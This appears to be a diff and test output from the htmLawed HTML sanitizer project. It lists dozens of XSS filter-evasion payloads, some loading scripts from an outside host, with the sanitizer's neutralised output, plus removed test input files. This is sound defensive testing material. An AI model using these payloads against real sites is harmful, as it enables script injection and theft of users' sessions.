&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;
4. SCRIPT w/Source File
Input code »
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Output code »
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
5. SCRIPT w/Char Code
Input code »
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »
&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
6. DIV background-image 1
Input code »
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Output code »
<div style="background-image: url(denied:javascript:alert('XSS'))"></div>
7. DIV background-image 2
Input code »
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
Output code »
<div style="background-image: url(denied:&amp;#1;javascript:alert('XSS'))"></div>
8. DIV expression
Input code »
<DIV STYLE="width: expression(alert('XSS'));">
Output code »
<div style="width: (alert('XSS'));"></div>
9. IFRAME
Input code »
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Output code »
&lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;
10. INPUT Image
Input code »
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Output code »
<input type="image" src="denied:javascript:alert('XSS');" />
11. IMG w/JavaScript Directive
Input code »
<IMG SRC="javascript:alert('XSS');">
Output code »
<img src="denied:javascript:alert('XSS');" alt="image" />
12. IMG No Quotes/Semicolon
Input code »
<IMG SRC=javascript:alert('XSS')>
Output code »
<img src="denied:javascript:alert(" alt="image" />
13. IMG Dynsrc
Input code »
<IMG DYNSRC="javascript:alert('XSS');">
Output code »
<img src="src" alt="image" />
14. IMG Lowsrc
Input code »
<IMG LOWSRC="javascript:alert('XSS');">
Output code »
<img src="src" alt="image" />
15. IMG Embedded commands 1
Input code »
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Output code »
<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />
16. IMG Embedded commands 2
Input code »
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Output code »
Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
17. IMG STYLE w/expression
Input code »
exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
Output code »
exp/*&lt;XSS STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2f;*XSS*//*/*/pression(alert("XSS"))'&gt;
18. IMG w/VBscript
Input code »
<IMG SRC='vbscript:msgbox("XSS")'>
Output code »
<img src="denied:vbscript:msgbox(&quot;XSS&quot;)" alt="image" />
19. LAYER
Input code »
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
Output code »
&lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;
20. Livescript
Input code »
<IMG SRC="livescript:[code]">
Output code »
<img src="denied:livescript:[code]" alt="image" />
21. US-ASCII encoding
Input code »
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
Output code »
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
22. Mocha
Input code »
<IMG SRC="mocha:[code]">
Output code »
<img src="denied:mocha:[code]" alt="image" />
23. OBJECT
Input code »
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Output code »
&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"&gt;&lt;/OBJECT&gt;
24. OBJECT w/Embedded XSS
Input code »
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
Output code »
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name="url" value="javascript:alert(" /&gt;&lt;/OBJECT&gt;
25. Embed Flash
Input code »
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Output code »
&lt;EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;
26. OBJECT w/Flash 2
Input code »
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
eval(a+b+c+d);
Output code »
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
eval(a+b+c+d);
27. STYLE
Input code »
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
Output code »
&lt;STYLE TYPE="text/javascript"&gt;alert('XSS');&lt;/STYLE&gt;
28. STYLE w/Comment
Input code »
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Output code »
<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />
29. STYLE w/Anonymous HTML
Input code »
<XSS STYLE="xss:expression(alert('XSS'))">
Output code »
&lt;XSS STYLE="xss:expression(alert('XSS'))"&gt;
30. TABLE
Input code »
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
Output code »
<table></table>
31. TD
Input code »
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
Output code »
<table>&lt;td&gt;&lt;/td&gt;</table>
32. XML namespace
Input code »
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
Output code »
&lt;HTML xmlns:xss&gt;
&lt;?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"&gt;
&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;
&lt;/HTML&gt;
33. XML data island w/CDATA
Input code »
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
Output code »
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[cript:alert('XSS');"&gt;]]&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;<span></span>
34. XML data island w/comment
Input code »
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
Output code »
&lt;XML ID="xss"&gt;<i><b><img src="src" alt="image" />cript:alert('XSS')"&gt;</b></i>&lt;/XML&gt;
<span></span>
35. XML (locally hosted)
Input code »
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
Output code »
&lt;XML SRC="http://ha.ckers.org/xsstest.xml" ID=I&gt;&lt;/XML&gt;
<span></span>
36. XML HTML+TIME
Input code »
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
Output code »
&lt;HTML&gt;&lt;BODY&gt;
&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;
&lt;?import namespace="t" implementation="#default#time2"&gt;
&lt;t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert('XSS')&lt;/SCRIPT&gt;"&gt; &lt;/BODY&gt;&lt;/HTML&gt;
37. Commented-out Block
Input code »
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
Output code »
&lt;!--[if gte IE 4]&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;![endif]--&gt;
38. Rename .js to .jpg
Input code »
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
Output code »
&lt;SCRIPT SRC="http://ha.ckers.org/xss.jpg"&gt;&lt;/SCRIPT&gt;
39. SSI
Input code »
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
Output code »
&lt;!--#exec cmd="/bin/echo '&lt;SCRIPT SRC'"--&gt;&lt;!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'"--&gt;
40. PHP
Input code »
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
Output code »
&lt;? echo('&lt;SCR)';
echo('IPT&gt;alert("XSS")&lt;/SCRIPT&gt;'); ?&gt;
41. JavaScript Includes
Input code »
<BR SIZE="&{alert('XSS')}">
Output code »
<br />
42. Case Insensitive
Input code »
<IMG SRC=JaVaScRiPt:alert('XSS')>
Output code »
<img src="denied:JaVaScRiPt:alert(" alt="image" />
43. HTML Entities
Input code »
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
Output code »
<img src="denied:javascript:alert(&quot;XSS&quot;)" alt="image" />
44. Grave Accents
Input code »
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Output code »
<img src="denied:`javascript:alert(" alt="image" />
45. Image w/CharCode
Input code »
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Output code »
<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />
46. UTF-8 Unicode Encoding
Input code »
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
Output code »
<img src="denied:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;" alt="image" />
47. Long UTF-8 Unicode w/out Semicolons
Input code »
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
Output code »
<img src="&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041" alt="image" />
48. DIV w/Unicode
Input code »
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
Output code »
<div style="background-image: 075 072 06C 028' 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029' 029"></div>
49. Hex Encoding w/out Semicolons
Input code »
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Output code »
<img src="&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29" alt="image" />
50. Embedded Tab
Input code »
<IMG SRC="jav ascript:alert('XSS');">
Output code »
<img src="denied:jav ascript:alert('XSS');" alt="image" />
51. Embedded Encoded Tab
Input code »
<IMG SRC="jav&#x09;ascript:alert('XSS');">
Output code »
<img src="denied:jav&#x9;ascript:alert('XSS');" alt="image" />
52. Embedded Newline
Input code »
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
Output code »
<img src="denied:jav&#xa;ascript:alert('XSS');" alt="image" />
53. Embedded Carriage Return
Input code »
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
Output code »
<img src="denied:jav&#xd;ascript:alert('XSS');" alt="image" />
54. Multiline w/Carriage Returns
Input code »
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
Output code »
<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />
55. Spaces/Meta Chars
Input code »
<IMG SRC=" &#14; javascript:alert('XSS');">
Output code »
<img src="denied:&amp;#14; javascript:alert('XSS');" alt="image" />
56. Non-Alpha/Non-Digit
Input code »
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
57. Non-Alpha/Non-Digit Part 2
Input code »
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Output code »
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;
58. No Closing Script Tag
Input code »
<SCRIPT SRC=http://ha.ckers.org/xss.js
Output code »
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js
59. Protocol resolution in script tags
Input code »
<SCRIPT SRC=//ha.ckers.org/.j>
Output code »
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
60. Half-Open HTML/JavaScript
Input code »
<IMG SRC="javascript:alert('XSS')"
Output code »
&lt;IMG SRC="javascript:alert('XSS')"
61. Double open angle brackets
Input code »
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
Output code »
&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
62. Extraneous Open Brackets
Input code »
<<SCRIPT>alert("XSS");//<</SCRIPT>
Output code »
&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;
63. Malformed IMG Tags
Input code »
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Output code »
<img src="src" alt="image" />&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;
64. No Quotes/Semicolons
Input code »
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
Output code »
&lt;SCRIPT&gt;a=/XSS/
alert(a.source)&lt;/SCRIPT&gt;
65. Evade Regex Filter 1
Input code »
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT a="&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
66. Evade Regex Filter 2
Input code »
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
67. Evade Regex Filter 3
Input code »
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
68. Evade Regex Filter 4
Input code »
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT "a='&gt;'" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
69. Evade Regex Filter 5
Input code »
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT a=`&gt;` SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
70. Filter Evasion 1
Input code »
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
71. Filter Evasion 2
Input code »
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT a="&gt;'&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
72. Mixed Encoding
Input code »
<A HREF="h
tt p://6&#09;6.000146.0x7.147/">XSS</A>
Output code »
<a href="denied:h tt p://6&#9;6.000146.0x7.147/">XSS</a>
73. JavaScript Link Location
Input code »
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Output code »
<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>

2
test-htmLawed.sh
View File

@ -2,4 +2,4 @@
# php -r 'require "htmLawed.php"; print htmLawed::sanitize(file_get_contents("test_xss.txt"), array("safe" => 1));' > test_php.htm
node_modules/.bin/eslint --rulesdir eslint-plugin-no-regex-dot htmLawed.js
node_modules/.bin/babel htmLawed.js > htmLawed.c.js
nodejs htmLawed-test.js test_xss.txt
nodejs htmLawed-test.js

42
test_php.htm
View File

@ -1,42 +0,0 @@
<img alt="&lt;img onmouseover=confirm(1)//" src="src" />
'';!--"=&amp;{()}<br />
<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
<img src="denied:javascript:alert('xss');" alt="image" /><br />
<img src="denied:java script:alert('xss');" alt="image" /><br />
<img src="denied:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;" alt="image" /><br />
<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
<br />
<br />
<br />
&lt;!--[if gte IE 4]&gt;alert('xss');&lt;![endif]--&gt;<br />
" src="http://ha.ckers.org/xss.js"&gt;<br />
<strong>Bad in PHP version without safe:</strong> " ";alert(window.location.href);//&gt;<br />
<br />
<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
<strong>Bad IE7:</strong> <a href="http://x&amp;x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: x */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="x" style="width: *** *;;;;;;*/ */(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: huh */ */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss(&quot;*/ &quot;);xss:ex XSS*/ /pression(alert(&quot;XSS&quot;))">x</a><br />
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="color: 065 078 070 072 065 073 073 069 06f 06e 028 061 06c 065 072 074 028 031 029 029">test</a><br />
<strong>Bad IE7:</strong> <a style="xss:e #48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
</span>

44
test_xss.txt
View File

@ -1,44 +0,0 @@
<img alt="<img onmouseover=confirm(1)//"<"">
'';!--"<xss>=&{()}<br />
<img src="javascript%3Aalert('xss');" /><br />
<img src="javascript:alert('xss');" /><br />
<img src="java script:alert('xss');" /><br />
<img
src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41; /><br />
<font color='#FF6699"onmouseover="alert(1)//'>test</font>
<font color='<img//onerror="alert`www.ptsecurity.com`"src=Psych0tr1a'>
<div style="javascript:alert('xss');"></div><br />
<div style="background-image:url(javascript:alert('xss'));"></div><br />
<div style="background-image:url(&quot;javascript:alert('xss')&quot; );"></div><br />
<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br />
<script a=">" src="http://ha.ckers.org/xss.js"></script><br />
<strong>Bad in PHP version without safe:</strong> <script a=">" ";alert(window.location.href);//></script><br />
<div style="background-image: &#117;r&#x6C;('js&#58;xss'&#x29;"></div><br />
<a style=";-moz-binding:url(http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert
%28%27xss%3f%29%29">x</a><br />
<strong>Opera:</strong> <a href="\xE2\x80\x83javascript:alert(123)">link</a>
<strong>Bad IE7:</strong> <a style=color:expr/*comment*/ession(alert(document.domain))>xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp&#x72;ession(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: &#101;xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/expression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/&#69;xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Exp&#x72;ession(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/* */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp /* */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background:/* x */expression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background:/* */ */expression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="x" style="width: /****/**;;;;;;*/expression/**/(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background:/**/expression(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: huh /* */ */expression(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background:/**/expression(alert('xss'));background:/**/expression(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> exp/*<a style='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>x</a><br />
<strong>Bad IE7:</strong> <a style="background:&#69;xpre\ssion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:expre&#x5c;ssion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="color: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e \0028 \0061 \006c \0065 \0072 \0074 \0028 \0031 \0029 \0029">test</a><br />
<strong>Bad IE7:</strong> <a style="xss:e&#92;&#48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:url('java
script:eval(document.all.mycode.expr)')">hi</a><br />